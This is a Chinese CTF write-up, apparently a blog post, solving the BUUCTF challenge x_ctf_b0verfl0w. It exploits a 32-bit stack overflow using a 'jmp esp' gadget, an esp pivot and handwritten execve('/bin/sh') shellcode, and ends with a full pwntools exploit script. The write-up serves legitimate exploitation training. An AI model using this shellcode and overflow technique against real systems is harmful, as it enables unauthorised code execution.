[BUUCTF]PWN——x_ctf_b0verfl0w(汇编代码写shellcode+jump esp指令劫持esp)

x_ctf_b0verfl0w

附件

步骤

  1. 例行检查,32位程序,开启了RELRO(不可改写got表)
    在这里插入图片描述

  2. 本地试运行一下程序,看看大概的情况
    在这里插入图片描述

  3. 32位ida载入
    在这里插入图片描述
    fgets可以溢出,但是只可以溢出0x32-0x20-0x4=14字节,由于没有开启nx,首先想到的是shellcode,0x20肯定放不进pwntools生成的shellcode,只能自己手写,但是得想办法劫持esp去执行我们的shellcode

  4. 在hit函数中找到了jump esp的gadget
    在这里插入图片描述
    因此我们可以构造这样的栈
    在这里插入图片描述
    ret上写的是jump esp,执行完ret之后会esp+4,指向了sub esp,0x28;jump esp,然后执行,esp又回到了shellcode的位置,然后jump esp;就执行了shellcode。
    关于执行完ret之后esp和eip的变化详细看这篇文章

  5. 如何手写shellcode参照我之前的文章,我这边就直接贴exp了

from pwn import *
context.log_level='debug'
r=remote('node3.buuoj.cn',29554)

shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
print len(shellcode)  #21

jmp_esp=0x8048504
sub_esp_jmp=asm('sub esp,0x28;jmp esp')

payload=shellcode+(0x20-len(shellcode)+4)*'a'+p32(jmp_esp)+sub_esp_jmp

r.sendline(payload)

r.interactive()

在这里插入图片描述

  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值